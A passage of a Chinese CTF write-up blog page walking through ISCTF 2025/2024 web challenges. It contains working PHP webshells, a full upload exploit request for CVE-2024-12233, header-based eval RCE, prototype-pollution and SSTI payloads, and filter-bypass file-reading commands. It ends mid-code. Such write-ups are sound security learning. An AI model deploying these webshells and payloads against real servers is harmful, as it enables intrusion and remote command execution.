<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>我的技术与生活——ISCTF 复现 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="shortcut icon" href="/imgs/shortcut-icon.ico" type="image/x-icon">
  <link rel="stylesheet" href="/css/public.css" />
  <link rel="stylesheet" href="/css/layout.css" />
  <link rel="stylesheet" href="/css/iconfont.css" />
  <link rel="stylesheet" href="/css/APlayer.min.css" />
  <script src="/js/APlayer.min.js"></script>
  <script src="/js/jquery.min.js"></script>
  <script src="/js/jquery.pjax.min.js"></script>

  <script src='//unpkg.com/valine/dist/Valine.min.js'></script>
  <script>
    document.title = `我的技术与生活——ISCTF 复现`
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>

<style>
  .load {
    width: 100%;
    height: 100vh;
    background-color: rgb(37, 35, 40);
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    position: relative;
    z-index: 9999;
  }
  .load-circle {
    width: 80px;
    height: 80px;
    border: 8px solid orange;
    border-bottom-color: transparent;
    border-radius: 50%;
    display: flex;
    justify-content: center;
    align-items: center;
    animation: rotate 1s linear infinite;
    filter: drop-shadow(0 0 3px orange);
  }
  .load-circle-inner {
    width: 40px;
    height: 40px;
    border: 8px solid orange;
    border-top-color: transparent;
    border-radius: 50%;
    animation: rotate-reverse .5s linear infinite;
  }
  .load-text {
    margin-top: 20px;
    font-size: 24px;
    color: orange;
    display: flex;
  }
  .load-text span {
    margin: 0 5px;
    text-shadow: 5px 5px 5px orange;
    animation: move 1s linear infinite;
  }
  .load-text span:nth-child(1) {
    animation-delay: -0.6s;
  }
  .load-text span:nth-child(2) {
    animation-delay: -0.5s;
  }
  .load-text span:nth-child(3) {
    animation-delay: -0.4s;
  }
  .load-text span:nth-child(4) {
    animation-delay: -0.3s;
  }
  .load-text span:nth-child(5) {
    animation-delay: -0.2s;
  }
  .load-text span:nth-child(6) {
    animation-delay: -0.1s;
  }
  @keyframes rotate {
    0% { transform: rotate(0); }
    100% { transform: rotate(360deg); }
  }
  @keyframes rotate-reverse {
    0% { transform: rotate(0); }
    100% { transform: rotate(-360deg); }
  }
  @keyframes move {
    0% { transform: translateY(0%) rotate(0) scale(1); }
    20% { transform: translateY(20%) rotate(10deg) scale(1.2); }
    80% { transform: translateY(-10%) rotate(-20deg) scale(.8);}
    100% { transform: translateY(0) rotate(0) scale(1); }
  }

  .progress {
    position: fixed;
    left: 0; top: 0;
    width: 0;
    height: 3px;
    background-color: green;
    transition: all cubic-bezier(0.215, 0.610, 0.355, 1) .1s;
    z-index: 9999;
  }

  .to-up {
    animation: toUp .5s 1;
  }
  .gray {
    position: fixed;
    left: 0;
    top: 0;
    width: 100%;
    height: 100vh;
    z-index: 9999;
    display: none;
    pointer-events: none;
    background-color: #000;
    mix-blend-mode: color;
  }
  @keyframes toUp {
    from { transform: translateY(15px); opacity: 0; }
    to { transform: translateY(0) ; opacity: 1; }
  }
</style>
<body>
  <div id="load" class="load">
    <div class="load-circle">
      <div class="load-circle-inner"></div>
    </div>
    <p class="load-text">
      <span>L</span>
      <span>O</span>
      <span>A</span>
      <span>D</span>
      <span>I</span>
      <span>N</span>
      <span>G</span>
    </p>
  </div>
  <div id="container" class="container w-100 vh-100" style="display: none;">
    <header class="header">
  <div class="header-wrapper">
    <div class="header-left">
      <div class="header-search">
        <input id="search-input" type="text" class="header-search--input" placeholder="请输入要检索的文章标题" />
        <span id="search-btn" class="header-search--icon"><i class="iconfont icon-sousuo"></i></span>
      </div>
      <div id="search-layer" class="header-search--layer hidden">
        <p class="title">
          <span>以下是搜索内容：</span>
          <span id="close-layer-btn">关闭</span>
        </p>
        <ul>
        </ul>
      </div>
    </div>
    <div class="header-right">
      <ul class="header-menu">
        <li>
          <a href="http://example.com/">
            <i class="header-menu--icon iconfont icon-shouye"></i>
            <span class="header-menu--span">首页</span>
          </a>
        </li>
        <li>
          <a href="http://example.com/log">
            <i class="header-menu--icon iconfont icon-rizhi"></i>
            <span class="header-menu--span">日志</span>
          </a>
        </li>
        <li>
          <a href="http://example.com/link">
            <i class="header-menu--icon iconfont icon-youqinglianjie"></i>
            <span class="header-menu--span">友情链接</span>
          </a>
        </li>
        <li>
          <a href="http://example.com/about">
            <i class="header-menu--icon iconfont icon-guanyuwomen"></i>
            <span class="header-menu--span">关于我</span>
          </a>
        </li>
      </ul>
    </div>
  </div>
</header>

<script>
  const ipt = document.querySelector('#search-input')
  const btn = document.querySelector('#search-btn')
  const layer = document.querySelector('#search-layer')
  const posts = JSON.parse(`[{"title":"DVWA","path":"2026/01/19/DVWA/"},{"title":"How to build up a blog site using Hexo and Guithub Pages","path":"2024/08/21/How-to-build-up-a-blog-site-using-Hexo-and-Guithub-Pages/"},{"title":"VScode","path":"2025/09/19/VScode/"},{"title":"ISCTF 复现","path":"2026/01/16/ISCTF-复现/"},{"title":"XSS","path":"2026/01/19/XSS/"},{"title":"php","path":"2025/10/05/php/"},{"title":"sql","path":"2025/10/10/sql/"},{"title":"web任务","path":"2025/10/04/web任务/"},{"title":"虚拟机搭建","path":"2024/09/15/虚拟机搭建/"},{"title":"极客大挑战2025 web复现","path":"2026/01/16/极客大挑战2025-web复现/"}]`)
  ipt.addEventListener('keyup', e => {
    if (e.key === 'Enter') {
      handleSearch()
    }
  })
  btn.addEventListener('click', () => {
    handleSearch()
  })

  document.querySelector('#close-layer-btn').addEventListener('click', () => {
    layer.classList.toggle('hidden')
  })

  function handleSearch() {
    if (ipt.value.trim() === '') {
      return
    }
    let html = ''
    const targetPosts = posts.filter(post => post.title.includes(ipt.value))
    targetPosts.forEach(post => {
      html += `
        <li>
          <div>
            <a href="/${post.path}">${post.title.replace(new RegExp(ipt.value), `<span>${ipt.value}</span>`)}</a>
          </div>
          <img src="${post.cover || '/imgs/default-cover.webp' }" />
        </li>
      `
    })
    if (html.trim () === '') {
      html += '<p class="empty">没有搜索到内容</p>'
    }
    layer.querySelector('ul').innerHTML = html
    layer.classList.remove('hidden')
  }
</script> 
    <section id="main" class="main">
      <div class="main-left-wrapper">
<div class="main-left">
  <div class="main-left--block">
    <div class="main-left--info">
      <img src="/imgs/avatar.jpg"" class="main-left--avatar" />
      <div class="main-left--intro">
        <p class="main-left--name">10Day</p>
        <div class="main-left--tags">
          <span class="main-left--tag">Fa</span>
          <span class="main-left--tag">Fu</span>
        </div>
      </div>
    </div>
  
    <div>
      <div class="main-left--motto">
        <p>“fa”</p>
        <p>“fu”</p>
      </div>
      <div class="main-left--github">
        <span class="line"></span>
        <a target="_blank" rel="noopener" href="https://github.com/Lin060807/Lin060807.github.io.git"><i class="logo iconfont icon-github-fill"></i></a>
        <span class="line"></span>
      </div>
      <div class="main-left--statics">
        <a href="/categories">
          <div>
            <span>0</span>
            <span>分类</span>
          </div>
        </a>
        <a href="/tags">
          <div>
            <span>0</span>
            <span>标签</span>
          </div>
        </a>
        <a href="/archives">
          <div>
            <span>5 </span>
            <span>归档</span>
          </div>
        </a>
      </div>
    </div>
  </div>

  <div class="main-left--block">
    <ul class="main-left--menu">
      
        <li>
          <a href="/">
            <span class="header-menu--span">小站首页</span>
            <i class="header-menu--icon iconfont icon-shouye"></i>
          </a>
        </li>
      
        <li>
          <a href="/log">
            <span class="header-menu--span">个人日志</span>
            <i class="header-menu--icon iconfont icon-rizhi"></i>
          </a>
        </li>
      
        <li>
          <a href="/link">
            <span class="header-menu--span">友情链接</span>
            <i class="header-menu--icon iconfont icon-youqinglianjie"></i>
          </a>
        </li>
      
        <li>
          <a href="/about">
            <span class="header-menu--span">关于自己</span>
            <i class="header-menu--icon iconfont icon-guanyuwomen"></i>
          </a>
        </li>
      
        <li>
          <a href="/tools">
            <span class="header-menu--span">我的工具</span>
            <i class="header-menu--icon iconfont icon-gongju"></i>
          </a>
        </li>
      
    </ul>
  </div>

  <div class="main-left--block">
    <div class="main-left--site">
      <h5 class="main-left--title">
        <span>站点信息</span>
        <i class="iconfont icon-zhandian"></i>
      </h5>
      <p class="main-left--subtitle">
        <span>文章数目：</span>
        <span>10 篇</span>
      </p>
      <p class="main-left--subtitle">
        <span>最近动态：</span>
        <span>今天</span>
      </p>
      <p class="main-left--subtitle">
        <span>上线时间：</span>
        <span>7109天</span>
      </p>
      <p class="main-left--subtitle">
        <span>当前版本：</span>
        <span>v1.0.2</span>
      </p>
    </div>
  </div>
</div></div>
      <div id="main-container" class="main-container">


  <link rel="stylesheet" href="/css/partial/article.css" />

<div class="article-container">
  <div class="article">
    <h1 class="article-title">ISCTF 复现</h1>
    <div class="article-info">
      <div class="article-info--item">
        <div class="article-info--info">
          
          <div class="article-info--categories">
            <span>分类：</span>
            
          </div>
          
          
          <div class="article-info--tags">
            <span>标签：</span>
            
          </div>
          
          <p class="article-info--date">日期：2026-01-16 13:40:50</p>
        </div>
        <img src="/imgs/default-cover.webp" alt="" class="article-cover">
      </div>
    </div>
    <article class="article-content markdown-body">
      <h4 id="2025ISCTF"><a href="#2025ISCTF" class="headerlink" title="2025ISCTF"></a>2025ISCTF</h4><h3 id="flag-我就借走了"><a href="#flag-我就借走了" class="headerlink" title="flag?我就借走了"></a>flag?我就借走了</h3><p><img src="https://github.com/Lin060807/images/raw/main/IS0.png" alt="IS0"> </p>
<p>软链接漏洞利用法，绕过文件读取限制，获取&#x2F;flag<br>软链接的作用：指向服务器上&#x2F;flag文件，软链接本身不储存内容，只是一个指向真实文件的“快捷方式”。</p>
<p>1.创建指向&#x2F;flag的软链接  ln -s &#x2F;flag link.txt<br>2.将软链接打包成tar文件  tar -cvf link.tar link.txt<br>3.上传link.tar到目标服务器 </p>
<p><img src="https://github.com/Lin060807/images/raw/main/IS1.png" alt="IS1"> </p>
<h3 id="Who-am-i"><a href="#Who-am-i" class="headerlink" title="Who am i"></a>Who am i</h3><p>1.先注册，登录的时候抓包,观察到type&#x3D;1，将1改为0时放包，变成管理员</p>
<p><img src="https://github.com/Lin060807/images/raw/main/IS2.png" alt="IS2"> </p>
<p>2.查看python源码，有一个地方用了pydash，可想到pydash原型链污染问题（pydash.set函数未过滤Python魔术属性，导致攻击者可通过构造路径越权修改类属性、全局变量）</p>
<p><img src="https://github.com/Lin060807/images/raw/main/IS3.png" alt="IS3"> </p>
<p>3.还可以看见可以渲染的路由（最后一行return render_template()作用是将传入的模板文件内容渲染为HTML返回给用户，可以通过控制point参数，让render_template()渲染&#x2F;flag文件，读取flag）</p>
<p><img src="https://github.com/Lin060807/images/raw/main/IS4.png" alt="IS4"> </p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span>operate?username<span class="operator">=</span>app<span class="operator">&amp;</span>password<span class="operator">=</span>jinja_loader.searchpath<span class="number">.0</span><span class="operator">&amp;</span>confirm_password<span class="operator">=</span><span class="operator">/</span></span><br></pre></td></tr></table></figure>

<p>username&#x3D;app指定要污染的目标对象是app，password&#x3D;jinja_loader.searchpath.0构造污染路径，指向searchpath属性，（jinja_loader是Flask模版引擎的加载器对象，searchpath是模板搜索路径列表，0表示修改列表第0个元素），confirm_password&#x3D;&#x2F;将模板搜索路径的第一个值设置为根目录&#x2F;。效果：原本Flask只会在templates&#x2F;目录下查找模板，被污染后直接去根目录下查找。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span>impression?point<span class="operator">=</span>flag</span><br></pre></td></tr></table></figure>

<p>point&#x3D;flag让render_template(“flag”)去渲染名为flag的模板。</p>
<h3 id="ezrce"><a href="#ezrce" class="headerlink" title="ezrce"></a>ezrce</h3><p>这题考无参rce，原理是攻击者无法直接执行system（“whoami”）这类带参数的函数。核心思路为使用无参数调用的函数和函数链式调用。<br>常见的无参函数包括：getenv()获取环境变量，getallheaders()获取所以HTTP请求头，phpinfp()输出PHP信息，dirname()返回路径中的目录部分，scandir()列出目录部分</p>
<p>在http头部添加自创的</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">abc:<span class="keyword">system</span>(“ls<span class="operator">/</span>”);</span><br></pre></td></tr></table></figure>

<p>之后再</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code<span class="operator">=</span>var_dump(getallheaders());</span><br></pre></td></tr></table></figure>

<p>提取所有 http 头，以数组形式返回，用reset()&#x2F;end()取出第一条&#x2F;最后一条</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code<span class="operator">=</span>var_dump(<span class="keyword">end</span>(getallheaders()));</span><br></pre></td></tr></table></figure>

<p><img src="https://github.com/Lin060807/images/raw/main/IS8.png" alt="IS8"> </p>
<p>Var_dump 改为 eval 可以命令执行</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code<span class="operator">=</span>eval(<span class="keyword">end</span>(getallheaders()));</span><br></pre></td></tr></table></figure>

<p>将ls&#x2F;变为cat&#x2F;flag则可得到flag</p>
<h3 id="b-by-n0t1ce-b0ard"><a href="#b-by-n0t1ce-b0ard" class="headerlink" title="b@by n0t1ce b0ard"></a>b@by n0t1ce b0ard</h3><p>攻击者可以在用户注册时通过上传头像上传恶意文件<br>1.在CVE官网找<a target="_blank" rel="noopener" href="https://www.cve.org/CVERecord?id=CVE-2024-12233">https://www.cve.org/CVERecord?id=CVE-2024-12233</a><br>2.在底下发现<a target="_blank" rel="noopener" href="https://github.com/LamentXU123/cve/blob/main/RCE1.md">https://github.com/LamentXU123/cve/blob/main/RCE1.md</a><br>3.找到POC复制到Burp重发器里</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line">POST <span class="operator">/</span>registration.php HTTP<span class="operator">/</span><span class="number">1.1</span></span><br><span class="line">Host: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">8081</span></span><br><span class="line">Content<span class="operator">-</span>Length: <span class="number">1172</span></span><br><span class="line">Cache<span class="operator">-</span>Control: max<span class="operator">-</span>age<span class="operator">=</span><span class="number">0</span></span><br><span class="line">sec<span class="operator">-</span>ch<span class="operator">-</span>ua: &quot;Chromium&quot;;v<span class="operator">=</span>&quot;131&quot;, &quot;Not_A Brand&quot;;v<span class="operator">=</span>&quot;24&quot;</span><br><span class="line">sec<span class="operator">-</span>ch<span class="operator">-</span>ua<span class="operator">-</span>mobile: ?<span class="number">0</span></span><br><span class="line">sec<span class="operator">-</span>ch<span class="operator">-</span>ua<span class="operator">-</span>platform: &quot;Windows&quot;</span><br><span class="line">Accept<span class="operator">-</span><span class="keyword">Language</span>: zh<span class="operator">-</span>CN,zh;q<span class="operator">=</span><span class="number">0.9</span></span><br><span class="line">Origin: http:<span class="operator">/</span><span class="operator">/</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">8081</span></span><br><span class="line">Content<span class="operator">-</span>Type: multipart<span class="operator">/</span>form<span class="operator">-</span>data; boundary<span class="operator">=</span><span class="comment">----WebKitFormBoundaryrHSdH2MF1kcJ6HUB</span></span><br><span class="line">Upgrade<span class="operator">-</span>Insecure<span class="operator">-</span>Requests: <span class="number">1</span></span><br><span class="line"><span class="keyword">User</span><span class="operator">-</span>Agent: Mozilla<span class="operator">/</span><span class="number">5.0</span> (Windows NT <span class="number">10.0</span>; Win64; x64) AppleWebKit<span class="operator">/</span><span class="number">537.36</span> (KHTML, <span class="keyword">like</span> Gecko) Chrome<span class="operator">/</span><span class="number">131.0</span><span class="number">.6778</span><span class="number">.86</span> Safari<span class="operator">/</span><span class="number">537.36</span></span><br><span class="line">Accept: text<span class="operator">/</span>html,application<span class="operator">/</span>xhtml<span class="operator">+</span>xml,application<span class="operator">/</span>xml;q<span class="operator">=</span><span class="number">0.9</span>,image<span class="operator">/</span>avif,image<span class="operator">/</span>webp,image<span class="operator">/</span>apng,<span class="operator">*</span><span class="comment">/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span></span><br><span class="line"><span class="comment">Sec-Fetch-Site: same-origin</span></span><br><span class="line"><span class="comment">Sec-Fetch-Mode: navigate</span></span><br><span class="line"><span class="comment">Sec-Fetch-User: ?1</span></span><br><span class="line"><span class="comment">Sec-Fetch-Dest: document</span></span><br><span class="line"><span class="comment">Referer: http://127.0.0.1:8081/registration.php</span></span><br><span class="line"><span class="comment">Accept-Encoding: gzip, deflate, br</span></span><br><span class="line"><span class="comment">Connection: keep-alive</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">------WebKitFormBoundaryrHSdH2MF1kcJ6HUB</span></span><br><span class="line"><span class="comment">Content-Disposition: form-data; name=&quot;n&quot;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">test</span></span><br><span class="line"><span class="comment">------WebKitFormBoundaryrHSdH2MF1kcJ6HUB</span></span><br><span class="line"><span class="comment">Content-Disposition: form-data; name=&quot;e&quot;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">test</span></span><br><span class="line"><span class="comment">------WebKitFormBoundaryrHSdH2MF1kcJ6HUB</span></span><br><span class="line"><span class="comment">Content-Disposition: form-data; name=&quot;p&quot;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">test</span></span><br><span class="line"><span class="comment">------WebKitFormBoundaryrHSdH2MF1kcJ6HUB</span></span><br><span class="line"><span class="comment">Content-Disposition: form-data; name=&quot;mob&quot;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">test</span></span><br><span class="line"><span class="comment">------WebKitFormBoundaryrHSdH2MF1kcJ6HUB</span></span><br><span class="line"><span class="comment">Content-Disposition: form-data; name=&quot;gen&quot;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">test</span></span><br><span class="line"><span class="comment">------WebKitFormBoundaryrHSdH2MF1kcJ6HUB</span></span><br><span class="line"><span class="comment">Content-Disposition: form-data; name=&quot;hob[]&quot;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">reading</span></span><br><span class="line"><span class="comment">------WebKitFormBoundaryrHSdH2MF1kcJ6HUB</span></span><br><span class="line"><span class="comment">Content-Disposition: form-data; name=&quot;img&quot;; filename=&quot;basic_webshell.php&quot;</span></span><br><span class="line"><span class="comment">Content-Type: application/octet-stream</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">&lt;?php @eval($_GET[&#x27;attack&#x27;]);?&gt;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">------WebKitFormBoundaryrHSdH2MF1kcJ6HUB</span></span><br><span class="line"><span class="comment">Content-Disposition: form-data; name=&quot;yy&quot;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">1950</span></span><br><span class="line"><span class="comment">------WebKitFormBoundaryrHSdH2MF1kcJ6HUB</span></span><br><span class="line"><span class="comment">Content-Disposition: form-data; name=&quot;mm&quot;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">2</span></span><br><span class="line"><span class="comment">------WebKitFormBoundaryrHSdH2MF1kcJ6HUB</span></span><br><span class="line"><span class="comment">Content-Disposition: form-data; name=&quot;dd&quot;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">3</span></span><br><span class="line"><span class="comment">------WebKitFormBoundaryrHSdH2MF1kcJ6HUB</span></span><br><span class="line"><span class="comment">Content-Disposition: form-data; name=&quot;save&quot;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Save</span></span><br><span class="line"><span class="comment">------WebKitFormBoundaryrHSdH2MF1kcJ6HUB--</span></span><br><span class="line"><span class="comment"></span></span><br></pre></td></tr></table></figure>
<p>但是我复制完其实没成功。。问了ai中间改成</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">&lt;</span>?php</span><br><span class="line">if(isset($_GET[<span class="string">&#x27;attack&#x27;</span>]))&#123;</span><br><span class="line">    $cmd <span class="operator">=</span> $_GET[<span class="string">&#x27;attack&#x27;</span>];</span><br><span class="line">    <span class="keyword">system</span>($cmd);</span><br><span class="line">&#125;</span><br><span class="line">?<span class="operator">&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://github.com/Lin060807/images/raw/main/IS5.png" alt="IS5"></p>
<p>4.之后访问&#x2F;images&#x2F;test&#x2F;basic_webshell.php?attack&#x3D;cat&#x2F;flag即可</p>
<h3 id="难过的bottle"><a href="#难过的bottle" class="headerlink" title="难过的bottle"></a>难过的bottle</h3><p>根据这篇原理<br><a target="_blank" rel="noopener" href="https://infernity.top/2025/09/16/Python-Unicode%E5%AD%97%E7%AC%A6%E6%9C%BA%E5%88%B6%E8%A7%A3%E6%9E%90/">https://infernity.top/2025/09/16/Python-Unicode%E5%AD%97%E7%AC%A6%E6%9C%BA%E5%88%B6%E8%A7%A3%E6%9E%90/</a></p>
<p><img src="https://github.com/Lin060807/images/raw/main/IS7.png" alt="IS7"></p>
<p>看见源码中存在黑名单，此处可以直接用斜体字绕过</p>
<p><img src="https://github.com/Lin060807/images/raw/main/IS6.png" alt="IS6"></p>
<p>在文件中输入斜体</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="keyword">open</span>(<span class="string">&#x27;/flag&#x27;</span>).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>压缩成zip形式，上传文件即可得到flag</p>
<h4 id="2024ISCTF"><a href="#2024ISCTF" class="headerlink" title="2024ISCTF"></a>2024ISCTF</h4><h3 id="25时晓山瑞希生日会"><a href="#25时晓山瑞希生日会" class="headerlink" title="25时晓山瑞希生日会"></a>25时晓山瑞希生日会</h3><p>根据提示修改客户端<br><img src="https://github.com/Lin060807/images/raw/main/240.png" alt="240"><br>添加XFF<br><img src="https://github.com/Lin060807/images/raw/main/241.png" alt="241"><br>添加日期，修改格式<br><img src="https://github.com/Lin060807/images/raw/main/242.png" alt="242"><br><img src="https://github.com/Lin060807/images/raw/main/243.png" alt="243"><br>修改时间<br><img src="https://github.com/Lin060807/images/raw/main/244.png" alt="244"><br>得到FLAG<br><img src="https://github.com/Lin060807/images/raw/main/245.png" alt="245"></p>
<h3 id="1z-php"><a href="#1z-php" class="headerlink" title="1z_php"></a>1z_php</h3><p>题目提供一句话木马（通过一个简单的输入点，实现对服务器远程命令执行或代码执行）</p>
<p><img src="https://github.com/Lin060807/images/raw/main/lz0.png" alt="lz0"></p>
<p>输入点:$_POST[‘J’],接收用户通过POST提交的参数J<br>执行点：system($call),直接将用户输入的内容作为系统命令执行<br>过滤了cat、tac等常用读文件命令</p>
<p>1.列出根目录文件</p>
<p><img src="https://github.com/Lin060807/images/raw/main/lz1.png" alt="lz1"></p>
<p>2.看到f14g文件，读取</p>
<p><img src="https://github.com/Lin060807/images/raw/main/lz2.png" alt="lz2"></p>
<p>常用基础读文件命令：cat（直接输出文件内容）、tac（倒叙输出文件内容）、head（输出文件开头几行）、tail（输出文件结尾几行）、more&#x2F;less（分页输出）<br>绕过过滤的“替身”命令：sort（读取文件并排序输出文件）、unique（读取文件并去除重复行）、wc（统计文件行数、单词数、字节数）、nl（读取文件并为每一行加行号）、od（八进制格式输出内容）、hexdump（十六进制输出文件内容）、strings（提取文件中的可打印字符串）</p>
<h3 id="UP-UPloader"><a href="#UP-UPloader" class="headerlink" title="UP!UPloader"></a>UP!UPloader</h3><p>文件上传➕文件包含漏洞➕伪协议读取源码</p>
<p>1.上传一句话木马，保存为文件sh.php</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">&lt;</span>?php <span class="variable">@eval</span>($_POST[<span class="string">&#x27;cmd&#x27;</span>]);?<span class="operator">&gt;</span></span><br></pre></td></tr></table></figure>

<p>2.上传文件之后出现下面这句话，输入include.php（作用：文件包含，输入文件路径后，服务器会读取该文件并执行）</p>
<p><img src="https://github.com/Lin060807/images/raw/main/u0.png" alt="u0"></p>
<p>3.出现了输入框，但是不知道文件存在哪个目录，要读取源码才能知道上传的保存目录、文件名规则。<br>通过php:&#x2F;&#x2F;filter对文件内容做BASE64编码后输出，绕过PHP解析，可以获取完整源码文件。（用convert.base64-encode的目的是让源码以纯文本形式返回，不会被PHP解析为代码执行）</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php:<span class="operator">/</span><span class="operator">/</span><span class="keyword">filter</span><span class="operator">/</span>read<span class="operator">=</span>convert.base64<span class="operator">-</span>encode<span class="operator">/</span>resource<span class="operator">=</span>upload.php</span><br></pre></td></tr></table></figure>

<p>之后返回一串BASE64编码</p>
<p><img src="https://github.com/Lin060807/images/raw/main/u1.png" alt="u1"></p>
<p>4.解码后可看见源码，可得上传目录为uploads&#x2F;，文件名规则为md5+原后缀</p>
<p><img src="https://github.com/Lin060807/images/raw/main/u2.png" alt="u2"></p>
<p>5.将文件名sh.php换成md5值，输入文件真实路径。</p>
<p><img src="https://github.com/Lin060807/images/raw/main/u3.png" alt="u3"></p>
<h3 id="ezSSTI"><a href="#ezSSTI" class="headerlink" title="ezSSTI"></a>ezSSTI</h3><p>这是一题ssti题目</p>
<p>测试语句</p>
<p><img src="https://github.com/Lin060807/images/raw/main/ez0.png" alt="ez0"></p>
<p><img src="https://github.com/Lin060807/images/raw/main/ez1.png" alt="ez1"></p>
<p>用bp抓包发现参数为user_input<br>直接用fenjing按照要求填入，即可获得FLAG</p>
<p><img src="https://github.com/Lin060807/images/raw/main/ez2.png" alt="ez2"></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fenjing webui</span><br></pre></td></tr></table></figure>

<h3 id="ezserialize"><a href="#ezserialize" class="headerlink" title="ezserialize"></a>ezserialize</h3><p>出现一段这样的代码</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">&lt;</span>?php</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">class Flag &#123;</span><br><span class="line">    private $flag;</span><br><span class="line"></span><br><span class="line">    public <span class="keyword">function</span> __construct() &#123;</span><br><span class="line">        $this<span class="operator">-</span><span class="operator">&gt;</span>flag <span class="operator">=</span> file_get_contents(<span class="string">&#x27;/flag&#x27;</span>);  #读取<span class="operator">/</span>flag文件内容</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public <span class="keyword">function</span> getFlag() &#123;</span><br><span class="line">        <span class="keyword">return</span> $this<span class="operator">-</span><span class="operator">&gt;</span>flag;</span><br><span class="line">    &#125;                              #返回读到的flag内容</span><br><span class="line"></span><br><span class="line">    